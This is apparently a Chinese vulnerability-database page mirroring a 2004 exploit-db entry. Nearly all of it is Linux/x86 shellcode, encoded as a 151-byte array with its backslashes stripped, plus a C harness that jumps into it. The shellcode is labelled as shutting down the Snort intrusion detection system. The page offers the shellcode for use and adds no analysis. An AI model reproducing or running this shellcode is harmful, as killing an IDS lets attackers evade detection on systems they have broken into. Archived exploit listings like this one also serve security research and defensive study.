Linux/x86 – Kill Snort Shellcode (151 bytes)

17次阅读
没有评论

Linux/x86 – Kill Snort Shellcode (151 bytes)

漏洞ID 1054661 漏洞类型
发布时间 2004-09-26 更新时间 2004-09-26
Linux/x86 - Kill Snort Shellcode (151 bytes)CVE编号 N/A
Linux/x86 - Kill Snort Shellcode (151 bytes)CNNVD-ID N/A
漏洞平台 Linux_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13431
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
 * x86 linux "snort IDS" shutter shellcode
 * size 151
 *
 * By nob0dy // find your own reality /
 *
 */

char snort_shutter_shellcode[] =
 "xebx03x5exebx05xe8xf8xffxff"
 "xffx83xc6x0dx31xc9xb1x80x80"
 "x36x01x46xe2xfaxeax18x2ex74"
 "x72x73x2ex63x68x6fx2ex71x6a"
 "x68x6dx6dx01x2cx31x38x01x72"
 "x6fx6ex73x75x01x80xedx66x2a"
 "x01x01xeax0cx91x91x91x91x91"
 "x91x91x91x91x91x91x91x91x54"
 "x88xe4x57x52x82xedx11xe9x01"
 "x01x01x01x5ax80xc2xcax11x01"
 "x01x30xd3xc6x44xf5x01x01x01"
 "x01x8cx82x08xeexfexfex8cxb2"
 "xfbxefxfexfex88x44xedx8cx82"
 "x0cxeexfexfex88x44xf1xb9x0a"
 "x01x01x01x88x74xe9x8cx4cxe9"
 "x52x88xf2xccx81x82xc5x11x5a"
 "x5fx5cxc2x91x91x91x91";

int main()
{
 void(* shutdown_snort)() = (void *)snort_shutter_shellcode ;
 shutdown_snort() ;
}

// milw0rm.com [2004-09-26]

相关推荐: HP Path MTU Discovery DoS Vulnerability

HP Path MTU Discovery DoS Vulnerability 漏洞ID 1104358 漏洞类型 Design Error 发布时间 2000-01-24 更新时间 2000-01-24 CVE编号 N/A CNNVD-ID N/A 漏洞平台…

正文完
 0